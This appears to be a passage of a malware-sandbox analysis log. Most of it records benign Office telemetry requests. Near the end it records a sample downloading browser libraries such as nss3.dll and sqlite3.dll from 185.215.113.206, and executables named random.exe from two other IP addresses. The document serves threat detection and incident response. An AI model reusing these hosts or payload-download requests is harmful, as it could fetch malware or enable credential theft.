Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11

Source: e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log8.8.dr	String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log8.8.dr	String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log8.8.dr	String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
